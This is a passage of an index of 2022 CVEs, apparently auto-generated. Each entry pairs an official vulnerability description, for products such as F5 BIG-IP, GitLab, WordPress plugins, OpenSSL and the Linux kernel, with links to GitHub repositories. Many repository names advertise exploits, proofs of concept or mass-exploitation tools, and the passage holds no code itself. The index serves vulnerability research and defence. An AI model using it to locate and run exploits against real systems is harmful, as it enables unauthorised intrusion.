- [Cyb3rEnthusiast/CVE-2022-1040](https://github.com/Cyb3rEnthusiast/CVE-2022-1040)
- [xMr110/CVE-2022-1040](https://github.com/xMr110/CVE-2022-1040)
### CVE-2022-1051 (2022-05-16)
The WPQA Builder Plugin WordPress plugin before 5.2, used as a companion plugin for the Discy and Himer , does not sanitise and escape the city, phone or profile credentials fields when outputting it in the profile page, allowing any authenticated user to perform Cross-Site Scripting attacks.
- [V35HR4J/CVE-2022-1051](https://github.com/V35HR4J/CVE-2022-1051)
### CVE-2022-1068 (2022-04-01)
Modbus Tools Modbus Slave (versions 7.4.2 and prior) is vulnerable to a stack-based buffer overflow in the registration field. This may cause the program to crash when a long character string is used.
- [webraybtl/CVE-2022-1068](https://github.com/webraybtl/CVE-2022-1068)
### CVE-2022-1077 (2022-03-29)
A vulnerability was found in TEM FLEX-1080 and FLEX-1085 1.6.0. It has been declared as problematic. This vulnerability log.cgi of the component Log Handler. A direct request leads to information disclosure of hardware information. The attack can be initiated remotely and does not require any form of authentication.
- [brosck/CVE-2022-1077](https://github.com/brosck/CVE-2022-1077)
### CVE-2022-1096 (2022-07-22)
Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
- [Mav3r1ck0x1/Chrome-and-Edge-Version-Dumper](https://github.com/Mav3r1ck0x1/Chrome-and-Edge-Version-Dumper)
### CVE-2022-1119 (2022-04-19)
The Simple File List WordPress plugin is vulnerable to Arbitrary File Download via the eeFile parameter found in the ~/includes/ee-downloader.php file due to missing controls which makes it possible unauthenticated attackers to supply a path to a file that will subsequently be downloaded, in versions up to and including 3.2.7.
- [z92g/CVE-2022-1119](https://github.com/z92g/CVE-2022-1119)
### CVE-2022-1162 (2022-04-04)
A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts
- [Greenwolf/CVE-2022-1162](https://github.com/Greenwolf/CVE-2022-1162)
- [ipsBruno/CVE-2022-1162](https://github.com/ipsBruno/CVE-2022-1162)
### CVE-2022-1175 (2022-04-04)
Improper neutralization of user input in GitLab CE/EE versions 14.4 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2 allowed an attacker to exploit XSS by injecting HTML in notes.
- [Greenwolf/CVE-2022-1175](https://github.com/Greenwolf/CVE-2022-1175)
### CVE-2022-1203 (2022-05-30)
The Content Mask WordPress plugin before 1.8.4.1 does not have authorisation and CSRF checks in various AJAX actions, as well as does not validate the option to be updated to ensure it belongs to the plugin. As a result, any authenticated user, such as subscriber could modify arbitrary blog options
- [RandomRobbieBF/CVE-2022-1203](https://github.com/RandomRobbieBF/CVE-2022-1203)
### CVE-2022-1227 (2022-04-29)
A privilege escalation flaw was found in Podman. This flaw allows an attacker to publish a malicious image to a public registry. Once this image is downloaded by a potential victim, the vulnerability is triggered after a user runs the 'podman top' command. This action gives the attacker access to the host filesystem, leading to information disclosure or denial of service.
- [iridium-soda/CVE-2022-1227_Exploit](https://github.com/iridium-soda/CVE-2022-1227_Exploit)
### CVE-2022-1292 (2022-05-03)
The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd).
- [li8u99/CVE-2022-1292](https://github.com/li8u99/CVE-2022-1292)
- [alcaparra/CVE-2022-1292](https://github.com/alcaparra/CVE-2022-1292)
- [rama291041610/CVE-2022-1292](https://github.com/rama291041610/CVE-2022-1292)
- [greek0x0/CVE-2022-1292](https://github.com/greek0x0/CVE-2022-1292)
- [und3sc0n0c1d0/CVE-2022-1292](https://github.com/und3sc0n0c1d0/CVE-2022-1292)
### CVE-2022-1329 (2022-04-19)
The Elementor Website Builder plugin for WordPress is vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file that make it possible for attackers to modify site data in addition to uploading malicious files that can be used to obtain remote code execution, in versions 3.6.0 to 3.6.2.
- [AkuCyberSec/CVE-2022-1329-WordPress-Elementor-3.6.0-3.6.1-3.6.2-Remote-Code-Execution-Exploit](https://github.com/AkuCyberSec/CVE-2022-1329-WordPress-Elementor-3.6.0-3.6.1-3.6.2-Remote-Code-Execution-Exploit)
- [mcdulltii/CVE-2022-1329](https://github.com/mcdulltii/CVE-2022-1329)
- [Grazee/CVE-2022-1329-WordPress-Elementor-RCE](https://github.com/Grazee/CVE-2022-1329-WordPress-Elementor-RCE)
- [dexit/CVE-2022-1329](https://github.com/dexit/CVE-2022-1329)
- [phanthibichtram12/CVE-2022-1329](https://github.com/phanthibichtram12/CVE-2022-1329)
- [AgustinESI/CVE-2022-1329](https://github.com/AgustinESI/CVE-2022-1329)
### CVE-2022-1364 (2022-07-26)
Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
- [A1Lin/cve-2022-1364](https://github.com/A1Lin/cve-2022-1364)
### CVE-2022-1386 (2022-05-16)
The Fusion Builder WordPress plugin before 3.6.2, used in the Avada theme, does not validate a parameter in its forms which could be used to initiate arbitrary HTTP requests. The data returned is then reflected back in the application's response. This could be used to interact with hosts on the server's local network bypassing firewalls and access control measures.
- [ardzz/CVE-2022-1386](https://github.com/ardzz/CVE-2022-1386)
- [im-hanzou/fubucker](https://github.com/im-hanzou/fubucker)
- [zycoder0day/CVE-2022-1386-Mass_Vulnerability](https://github.com/zycoder0day/CVE-2022-1386-Mass_Vulnerability)
- [satyasai1460/CVE-2022-1386](https://github.com/satyasai1460/CVE-2022-1386)
### CVE-2022-1388 (2022-05-05)
On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated
- [numanturle/CVE-2022-1388](https://github.com/numanturle/CVE-2022-1388)
- [jheeree/CVE-2022-1388-checker](https://github.com/jheeree/CVE-2022-1388-checker)
- [MrCl0wnLab/Nuclei-Template-CVE-2022-1388-BIG-IP-iControl-REST-Exposed](https://github.com/MrCl0wnLab/Nuclei-Template-CVE-2022-1388-BIG-IP-iControl-REST-Exposed)
- [Osyanina/westone-CVE-2022-1388-scanner](https://github.com/Osyanina/westone-CVE-2022-1388-scanner)
- [doocop/CVE-2022-1388-EXP](https://github.com/doocop/CVE-2022-1388-EXP)
- [blind-intruder/CVE-2022-1388-RCE-checker-and-POC-Exploit](https://github.com/blind-intruder/CVE-2022-1388-RCE-checker-and-POC-Exploit)
- [Hudi233/CVE-2022-1388](https://github.com/Hudi233/CVE-2022-1388)
- [sherlocksecurity/CVE-2022-1388-Exploit-POC](https://github.com/sherlocksecurity/CVE-2022-1388-Exploit-POC)
- [yukar1z0e/CVE-2022-1388](https://github.com/yukar1z0e/CVE-2022-1388)
- [0xf4n9x/CVE-2022-1388](https://github.com/0xf4n9x/CVE-2022-1388)
- [alt3kx/CVE-2022-1388_PoC](https://github.com/alt3kx/CVE-2022-1388_PoC)
- [Vulnmachines/F5-Big-IP-CVE-2022-1388](https://github.com/Vulnmachines/F5-Big-IP-CVE-2022-1388)
- [ZephrFish/F5-CVE-2022-1388-Exploit](https://github.com/ZephrFish/F5-CVE-2022-1388-Exploit)
- [horizon3ai/CVE-2022-1388](https://github.com/horizon3ai/CVE-2022-1388)
- [Al1ex/CVE-2022-1388](https://github.com/Al1ex/CVE-2022-1388)
- [Henry4E36/CVE-2022-1388](https://github.com/Henry4E36/CVE-2022-1388)
- [savior-only/CVE-2022-1388](https://github.com/savior-only/CVE-2022-1388)
- [saucer-man/CVE-2022-1388](https://github.com/saucer-man/CVE-2022-1388)
- [superzerosec/CVE-2022-1388](https://github.com/superzerosec/CVE-2022-1388)
- [Stonzyy/Exploit-F5-CVE-2022-1388](https://github.com/Stonzyy/Exploit-F5-CVE-2022-1388)
- [MrCl0wnLab/Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter](https://github.com/MrCl0wnLab/Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter)
- [qusaialhaddad/F5-BigIP-CVE-2022-1388](https://github.com/qusaialhaddad/F5-BigIP-CVE-2022-1388)
- [chesterblue/CVE-2022-1388](https://github.com/chesterblue/CVE-2022-1388)
- [Angus-Team/F5-BIG-IP-RCE-CVE-2022-1388](https://github.com/Angus-Team/F5-BIG-IP-RCE-CVE-2022-1388)
- [LinJacck/CVE-2022-1388-EXP](https://github.com/LinJacck/CVE-2022-1388-EXP)
- [iveresk/cve-2022-1388-1veresk](https://github.com/iveresk/cve-2022-1388-1veresk)
- [shamo0/CVE-2022-1388](https://github.com/shamo0/CVE-2022-1388)
- [vesperp/CVE-2022-1388-F5-BIG-IP](https://github.com/vesperp/CVE-2022-1388-F5-BIG-IP)
- [thatonesecguy/CVE-2022-1388-Exploit](https://github.com/thatonesecguy/CVE-2022-1388-Exploit)
- [bandit92/CVE2022-1388_TestAPI](https://github.com/bandit92/CVE2022-1388_TestAPI)
- [0x7eTeam/CVE-2022-1388-PocExp](https://github.com/0x7eTeam/CVE-2022-1388-PocExp)
- [0xAgun/CVE-2022-1388](https://github.com/0xAgun/CVE-2022-1388)
- [AmirHoseinTangsiriNET/CVE-2022-1388-Scanner](https://github.com/AmirHoseinTangsiriNET/CVE-2022-1388-Scanner)
- [EvilLizard666/CVE-2022-1388](https://github.com/EvilLizard666/CVE-2022-1388)
- [mr-vill4in/CVE-2022-1388](https://github.com/mr-vill4in/CVE-2022-1388)
- [omnigodz/CVE-2022-1388](https://github.com/omnigodz/CVE-2022-1388)
- [pauloink/CVE-2022-1388](https://github.com/pauloink/CVE-2022-1388)
- [SecTheBit/CVE-2022-1388](https://github.com/SecTheBit/CVE-2022-1388)
- [Zeyad-Azima/CVE-2022-1388](https://github.com/Zeyad-Azima/CVE-2022-1388)
- [justakazh/CVE-2022-1388](https://github.com/justakazh/CVE-2022-1388)
- [PsychoSec2/CVE-2022-1388-POC](https://github.com/PsychoSec2/CVE-2022-1388-POC)
- [iveresk/cve-2022-1388-iveresk-command-shell](https://github.com/iveresk/cve-2022-1388-iveresk-command-shell)
- [Wrin9/CVE-2022-1388](https://github.com/Wrin9/CVE-2022-1388)
- [aancw/CVE-2022-1388-rs](https://github.com/aancw/CVE-2022-1388-rs)
- [west9b/F5-BIG-IP-POC](https://github.com/west9b/F5-BIG-IP-POC)
- [sashka3076/F5-BIG-IP-exploit](https://github.com/sashka3076/F5-BIG-IP-exploit)
- [Chocapikk/CVE-2022-1388](https://github.com/Chocapikk/CVE-2022-1388)
- [li8u99/CVE-2022-1388](https://github.com/li8u99/CVE-2022-1388)
- [electr0lulz/Mass-CVE-2022-1388](https://github.com/electr0lulz/Mass-CVE-2022-1388)
- [Luchoane/CVE-2022-1388_refresh](https://github.com/Luchoane/CVE-2022-1388_refresh)
- [jbharucha05/CVE-2022-1388](https://github.com/jbharucha05/CVE-2022-1388)
- [On-Cyber-War/CVE-2022-1388](https://github.com/On-Cyber-War/CVE-2022-1388)
- [forktheplanet/CVE-2022-1388](https://github.com/forktheplanet/CVE-2022-1388)
- [revanmalang/CVE-2022-1388](https://github.com/revanmalang/CVE-2022-1388)
- [amitlttwo/CVE-2022-1388](https://github.com/amitlttwo/CVE-2022-1388)
- [M4fiaB0y/CVE-2022-1388](https://github.com/M4fiaB0y/CVE-2022-1388)
- [devengpk/CVE-2022-1388](https://github.com/devengpk/CVE-2022-1388)
- [vaelwolf/CVE-2022-1388](https://github.com/vaelwolf/CVE-2022-1388)
- [j-baines/tippa-my-tongue](https://github.com/j-baines/tippa-my-tongue)
- [SudeepaShiranthaka/F5-BIG-IP-Remote-Code-Execution-Vulnerability-CVE-2022-1388-A-Case-Study](https://github.com/SudeepaShiranthaka/F5-BIG-IP-Remote-Code-Execution-Vulnerability-CVE-2022-1388-A-Case-Study)
- [battleofthebots/refresh](https://github.com/battleofthebots/refresh)
- [nvk0x/CVE-2022-1388-exploit](https://github.com/nvk0x/CVE-2022-1388-exploit)
- [nico989/CVE-2022-1388](https://github.com/nico989/CVE-2022-1388)
- [gotr00t0day/CVE-2022-1388](https://github.com/gotr00t0day/CVE-2022-1388)
- [impost0r/CVE-2022-1388](https://github.com/impost0r/CVE-2022-1388)
### CVE-2022-1421 (2022-06-06)
The Discy WordPress theme before 5.2 lacks CSRF checks in some AJAX actions, allowing an attacker to make a logged in admin change arbitrary 's settings including payment methods via a CSRF attack
- [nb1b3k/CVE-2022-1421](https://github.com/nb1b3k/CVE-2022-1421)
### CVE-2022-1442 (2022-05-10)
The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3.
- [RandomRobbieBF/CVE-2022-1442](https://github.com/RandomRobbieBF/CVE-2022-1442)
### CVE-2022-1471 (2022-12-01)
SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization. We recommend upgrading to version 2.0 and beyond.\n
- [1fabunicorn/SnakeYAML-CVE-2022-1471-POC](https://github.com/1fabunicorn/SnakeYAML-CVE-2022-1471-POC)
- [falconkei/snakeyaml_cve_poc](https://github.com/falconkei/snakeyaml_cve_poc)
### CVE-2022-1565 (2022-07-18)
The plugin WP All Import is vulnerable to arbitrary file uploads due to missing file type validation via the wp_all_import_get_gz.php file in versions up to, and including, 3.6.7. This makes it possible for authenticated attackers, with administrator level permissions and above, to upload arbitrary files on the affected sites server which may make remote code execution possible.
- [phanthibichtram12/CVE-2022-1565](https://github.com/phanthibichtram12/CVE-2022-1565)
### CVE-2022-1597 (2022-06-06)
The WPQA Builder WordPress plugin before 5.4, used as a companion for the Discy and Himer , does not sanitise and escape a parameter on its reset password form which makes it possible to perform Reflected Cross-Site Scripting attacks
- [V35HR4J/CVE-2022-1597](https://github.com/V35HR4J/CVE-2022-1597)
### CVE-2022-1598 (2022-06-06)
The WPQA Builder WordPress plugin before 5.5 which is a companion to the Discy and Himer , lacks authentication in a REST API endpoint, allowing unauthenticated users to discover private questions sent between users on the site.
- [V35HR4J/CVE-2022-1598](https://github.com/V35HR4J/CVE-2022-1598)
### CVE-2022-1609 (2024-01-16)
The School Management WordPress plugin before 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.
- [savior-only/CVE-2022-1609](https://github.com/savior-only/CVE-2022-1609)
- [0xSojalSec/CVE-2022-1609](https://github.com/0xSojalSec/CVE-2022-1609)
- [0xSojalSec/-CVE-2022-1609](https://github.com/0xSojalSec/-CVE-2022-1609)
- [w4r3s/cve-2022-1609-exploit](https://github.com/w4r3s/cve-2022-1609-exploit)
### CVE-2022-1679 (2022-05-16)
A use-after-free flaw was found in the Linux kernel’s Atheros wireless adapter driver in the way a user forces the ath9k_htc_wait_for_target function to fail with some input messages. This flaw allows a local user to crash or potentially escalate their privileges on the system.
- [EkamSinghWalia/-Detection-and-Mitigation-for-CVE-2022-1679](https://github.com/EkamSinghWalia/-Detection-and-Mitigation-for-CVE-2022-1679)
- [ov3rwatch/Detection-and-Mitigation-for-CVE-2022-1679](https://github.com/ov3rwatch/Detection-and-Mitigation-for-CVE-2022-1679)
### CVE-2022-1802 (2022-12-22)
If an attacker was able to corrupt the methods of an Array object in JavaScript via prototype pollution, they could have achieved execution of attacker-controlled JavaScript code in a privileged context. This vulnerability affects Firefox ESR < 91.9.1, Firefox < 100.0.2, Firefox for Android < 100.3.0, and Thunderbird < 91.9.1.
- [mistymntncop/CVE-2022-1802](https://github.com/mistymntncop/CVE-2022-1802)
### CVE-2022-1903 (2022-06-27)
The ARMember WordPress plugin before 3.4.8 is vulnerable to account takeover (even the administrator) due to missing nonce and authorization checks in an AJAX action available to unauthenticated users, allowing them to change the password of arbitrary users by knowing their username
- [biulove0x/CVE-2022-1903](https://github.com/biulove0x/CVE-2022-1903)
### CVE-2022-1966
- [ASkyeye/CVE-2022-1966](https://github.com/ASkyeye/CVE-2022-1966)
### CVE-2022-1972
- [randorisec/CVE-2022-1972-infoleak-PoC](https://github.com/randorisec/CVE-2022-1972-infoleak-PoC)
### CVE-2022-2078 (2022-06-30)
A vulnerability was found in the Linux kernel's nft_set_desc_concat_parse() function .This flaw allows an attacker to trigger a buffer overflow via nft_set_desc_concat_parse() , causing a denial of service and possibly to run code.
- [delsploit/CVE-2022-2078](https://github.com/delsploit/CVE-2022-2078)
### CVE-2022-2097 (2022-07-05)
AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).
- [PeterThomasAwen/OpenSSLUpgrade1.1.1q-Ubuntu](https://github.com/PeterThomasAwen/OpenSSLUpgrade1.1.1q-Ubuntu)
### CVE-2022-2109
- [Vulnmachines/oracle-weblogic-CVE-2021-2109](https://github.com/Vulnmachines/oracle-weblogic-CVE-2021-2109)
### CVE-2022-2185 (2022-07-01)
A critical issue has been discovered in GitLab affecting all versions starting from 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 where an authenticated user authorized to import projects could import a maliciously crafted project leading to remote code execution.
- [safe3s/CVE-2022-2185-poc](https://github.com/safe3s/CVE-2022-2185-poc)
- [ESUAdmin/CVE-2022-2185](https://github.com/ESUAdmin/CVE-2022-2185)
### CVE-2022-2274 (2022-07-01)
The OpenSSL 3.0.4 release introduced a serious bug in the RSA implementation for X86_64 CPUs supporting the AVX512IFMA instructions. This issue makes the RSA implementation with 2048 bit private keys incorrect on such machines and memory corruption will happen during the computation. As a consequence of the memory corruption an attacker may be able to trigger a remote code execution on the machine performing the computation. SSL/TLS servers or other servers using 2048 bit RSA private keys running on machines supporting AVX512IFMA instructions of the X86_64 architecture are affected by this issue.
- [Malwareman007/CVE-2022-2274](https://github.com/Malwareman007/CVE-2022-2274)
- [EkamSinghWalia/OpenSSL-Vulnerability-Detection-Script](https://github.com/EkamSinghWalia/OpenSSL-Vulnerability-Detection-Script)
- [DesmondSanctity/CVE-2022-2274](https://github.com/DesmondSanctity/CVE-2022-2274)
### CVE-2022-2333 (2022-09-16)
If an attacker manages to trick a valid user into loading a malicious DLL, the attacker may be able to achieve code execution in Honeywell SoftMaster version 4.51 application’s context and permissions.
- [shirouQwQ/CVE-2022-2333](https://github.com/shirouQwQ/CVE-2022-2333)
### CVE-2022-2414 (2022-07-29)
Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests.
- [superhac/CVE-2022-2414-POC](https://github.com/superhac/CVE-2022-2414-POC)
- [amitlttwo/CVE-2022-2414-Proof-Of-Concept](https://github.com/amitlttwo/CVE-2022-2414-Proof-Of-Concept)
- [satyasai1460/CVE-2022-2414](https://github.com/satyasai1460/CVE-2022-2414)
- [geniuszlyy/CVE-2022-2414](https://github.com/geniuszlyy/CVE-2022-2414)
### CVE-2022-2466 (2022-08-31)
It was found that Quarkus 2.10.x does not terminate HTTP requests header context which may lead to unpredictable behavior.
- [yuxblank/CVE-2022-2466---Request-Context-not-terminated-with-GraphQL](https://github.com/yuxblank/CVE-2022-2466---Request-Context-not-terminated-with-GraphQL)
### CVE-2022-2546 (2023-02-02)
The All-in-One WP Migration WordPress plugin before 7.63 uses the wrong content type, and does not properly escape the response from the ai1wm_export AJAX action, allowing an attacker to craft a request that when submitted by any visitor will inject arbitrary html or javascript into the response that will be executed in the victims session. Note: This requires knowledge of a static secret key
- [OpenXP-Research/CVE-2022-2546](https://github.com/OpenXP-Research/CVE-2022-2546)
### CVE-2022-2586 (2024-01-08)
It was discovered that a nft object or expression could reference a nft set on a different nft table, leading to a use-after-free once that table was deleted.
- [aels/CVE-2022-2586-LPE](https://github.com/aels/CVE-2022-2586-LPE)
- [sniper404ghostxploit/CVE-2022-2586](https://github.com/sniper404ghostxploit/CVE-2022-2586)
### CVE-2022-2588 (2024-01-08)
It was discovered that the cls_route filter implementation in the Linux kernel would not remove an old filter from the hashtable before freeing it if its handle had the value 0.
- [Markakd/CVE-2022-2588](https://github.com/Markakd/CVE-2022-2588)
- [ASkyeye/2022-LPE-UAF](https://github.com/ASkyeye/2022-LPE-UAF)
- [pirenga/2022-LPE-UAF](https://github.com/pirenga/2022-LPE-UAF)
- [konoha279/2022-LPE-UAF](https://github.com/konoha279/2022-LPE-UAF)
- [PolymorphicOpcode/CVE-2022-2588](https://github.com/PolymorphicOpcode/CVE-2022-2588)
- [BassamGraini/CVE-2022-2588](https://github.com/BassamGraini/CVE-2022-2588)
- [veritas501/CVE-2022-2588](https://github.com/veritas501/CVE-2022-2588)
- [dom4570/CVE-2022-2588](https://github.com/dom4570/CVE-2022-2588)
### CVE-2022-2590 (2022-08-31)
A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only shared memory mappings. This flaw allows an unprivileged, local user to gain write access to read-only memory mappings, increasing their privileges on the system.
- [hyeonjun17/CVE-2022-2590-analysis](https://github.com/hyeonjun17/CVE-2022-2590-analysis)
### CVE-2022-2602 (2024-01-08)
io_uring UAF, Unix SCM garbage collection
- [LukeGix/CVE-2022-2602](https://github.com/LukeGix/CVE-2022-2602)
- [kiks7/CVE-2022-2602-Kernel-Exploit](https://github.com/kiks7/CVE-2022-2602-Kernel-Exploit)
- [th3-5had0w/CVE-2022-2602-Study](https://github.com/th3-5had0w/CVE-2022-2602-Study)
### CVE-2022-2639 (2022-09-01)
An integer coercion error was found in the openvswitch kernel module. Given a sufficiently large number of actions, while copying and reserving memory for a new action of a new flow, the reserve_sfa_size() function does not return -EMSGSIZE as expected, potentially leading to an out-of-bounds write access. This flaw allows a local user to crash or potentially escalate their privileges on the system.
- [bb33bb/CVE-2022-2639-PipeVersion](https://github.com/bb33bb/CVE-2022-2639-PipeVersion)
- [EkamSinghWalia/Detection-and-Mitigation-for-CVE-2022-2639](https://github.com/EkamSinghWalia/Detection-and-Mitigation-for-CVE-2022-2639)
- [letsr00t/-2022-LOCALROOT-CVE-2022-2639](https://github.com/letsr00t/-2022-LOCALROOT-CVE-2022-2639)
- [devetop/CVE-2022-2639-PipeVersion](https://github.com/devetop/CVE-2022-2639-PipeVersion)
### CVE-2022-2884 (2022-10-17)
A vulnerability in GitLab CE/EE affecting all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 15.3 to 15.3 to 15.3.1 allows an an authenticated user to achieve remote code execution via the Import from GitHub API endpoint
- [m3ssap0/gitlab_rce_cve-2022-2884](https://github.com/m3ssap0/gitlab_rce_cve-2022-2884)
### CVE-2022-2992 (2022-10-17)
A vulnerability in GitLab CE/EE affecting all versions from 11.10 prior to 15.1.6, 15.2 to 15.2.4, 15.3 to 15.3.2 allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint.
- [CsEnox/CVE-2022-2992](https://github.com/CsEnox/CVE-2022-2992)
- [Malwareman007/CVE-2022-2992](https://github.com/Malwareman007/CVE-2022-2992)
### CVE-2022-3168
- [irsl/CVE-2022-3168-adb-unexpected-reverse-forwards](https://github.com/irsl/CVE-2022-3168-adb-unexpected-reverse-forwards)
### CVE-2022-3172 (2023-11-03)
A security issue was discovered in kube-apiserver that allows an \naggregated API server to redirect client traffic to any URL. This could\n lead to the client performing unexpected actions as well as forwarding \nthe client's API server credentials to third parties.\n
- [UgOrange/CVE-2022-3172](https://github.com/UgOrange/CVE-2022-3172)
### CVE-2022-3317 (2022-11-01)
Insufficient validation of untrusted input in Intents in Google Chrome on Android prior to 106.0.5249.62 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low)
- [hfh86/CVE-2022-3317](https://github.com/hfh86/CVE-2022-3317)
### CVE-2022-3328 (2024-01-08)
Race condition in snap-confine's must_mkdir_and_open_with_perms()
- [Mr-xn/CVE-2022-3328](https://github.com/Mr-xn/CVE-2022-3328)
### CVE-2022-3357 (2022-10-31)
The Smart Slider 3 WordPress plugin before 3.5.1.11 unserialises the content of an imported file, which could lead to PHP object injection issues when a user import (intentionally or not) a malicious file, and a suitable gadget chain is present on the site.
- [iamz24/CVE-2021-3493_CVE-2022-3357](https://github.com/iamz24/CVE-2021-3493_CVE-2022-3357)
### CVE-2022-3368 (2022-10-17)
A vulnerability within the Software Updater functionality of Avira Security for Windows allowed an attacker with write access to the filesystem, to escalate his privileges in certain scenarios. The issue was fixed with Avira Security version 1.1.72.30556.
- [Wh04m1001/CVE-2022-3368](https://github.com/Wh04m1001/CVE-2022-3368)
- [byt3n33dl3/CrackAVFee](https://github.com/byt3n33dl3/CrackAVFee)
### CVE-2022-3464 (2022-10-12)
A vulnerability classified as problematic has been found in puppyCMS up to 5.1. This affects an unknown part of the file /admin/settings.php. The manipulation of the argument site_name leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-210699.
- [GYLQ/CVE-2022-3464](https://github.com/GYLQ/CVE-2022-3464)
### CVE-2022-3518 (2022-10-15)
A vulnerability classified as problematic has been found in SourceCodester Sanitization Management System 1.0. Affected is an unknown function of the component User Creation Handler. The manipulation of the argument First Name/Middle Name/Last Name leads to cross site scripting. It is possible to launch the attack remotely. VDB-211014 is the identifier assigned to this vulnerability.
- [lohith19/CVE-2022-3518](https://github.com/lohith19/CVE-2022-3518)
### CVE-2022-3546 (2022-10-17)
A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /csms/admin/?page=user/list of the component Create User Handler. The manipulation of the argument First Name/Last Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-211046 is the identifier assigned to this vulnerability.
- [thehackingverse/CVE-2022-3546](https://github.com/thehackingverse/CVE-2022-3546)
### CVE-2022-3552 (2022-10-17)
Unrestricted Upload of File with Dangerous Type in GitHub repository boxbilling/boxbilling prior to 0.0.1.
- [kabir0x23/CVE-2022-3552](https://github.com/kabir0x23/CVE-2022-3552)
### CVE-2022-3564 (2022-10-17)
A vulnerability classified as critical was found in Linux Kernel. Affected by this vulnerability is the function l2cap_reassemble_sdu of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211087.
- [Trinadh465/linux-4.1.15_CVE-2022-3564](https://github.com/Trinadh465/linux-4.1.15_CVE-2022-3564)
### CVE-2022-3590 (2022-12-14)
WordPress is affected by an unauthenticated blind SSRF in the pingback feature. Because of a TOCTOU race condition between the validation checks and the HTTP request, attackers can reach internal hosts that are explicitly forbidden.
- [hxlxmjxbbxs/CVE-2022-3590-WordPress-Vulnerability-Scanner](https://github.com/hxlxmjxbbxs/CVE-2022-3590-WordPress-Vulnerability-Scanner)
- [huynhvanphuc/CVE-2022-3590-WordPress-Vulnerability-Scanner](https://github.com/huynhvanphuc/CVE-2022-3590-WordPress-Vulnerability-Scanner)
### CVE-2022-3602 (2022-11-01)
A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs after certificate chain signature verification and requires either a CA to have signed the malicious certificate or for the application to continue certificate verification despite failure to construct a path to a trusted issuer. An attacker can craft a malicious email address to overflow four attacker-controlled bytes on the stack. This buffer overflow could result in a crash (causing a denial of service) or potentially remote code execution. Many platforms implement stack overflow protections which would mitigate against the risk of remote code execution. The risk may be further mitigated based on stack layout for any given platform/compiler. Pre-announcements of CVE-2022-3602 described this issue as CRITICAL. Further analysis based on some of the mitigating factors described above have led this to be downgraded to HIGH. Users are still encouraged to upgrade to a new version as soon as possible. In a TLS client, this can be triggered by connecting to a malicious server. In a TLS server, this can be triggered if the server requests client authentication and a malicious client connects. Fixed in OpenSSL 3.0.7 (Affected 3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6).
- [NCSC-NL/OpenSSL-2022](https://github.com/NCSC-NL/OpenSSL-2022)
- [colmmacc/CVE-2022-3602](https://github.com/colmmacc/CVE-2022-3602)
- [eatscrayon/CVE-2022-3602-poc](https://github.com/eatscrayon/CVE-2022-3602-poc)
- [attilaszia/cve-2022-3602](https://github.com/attilaszia/cve-2022-3602)
- [alicangnll/SpookySSL-Scanner](https://github.com/alicangnll/SpookySSL-Scanner)
- [rbowes-r7/cve-2022-3602-and-cve-2022-3786-openssl-poc](https://github.com/rbowes-r7/cve-2022-3602-and-cve-2022-3786-openssl-poc)
- [corelight/CVE-2022-3602](https://github.com/corelight/CVE-2022-3602)
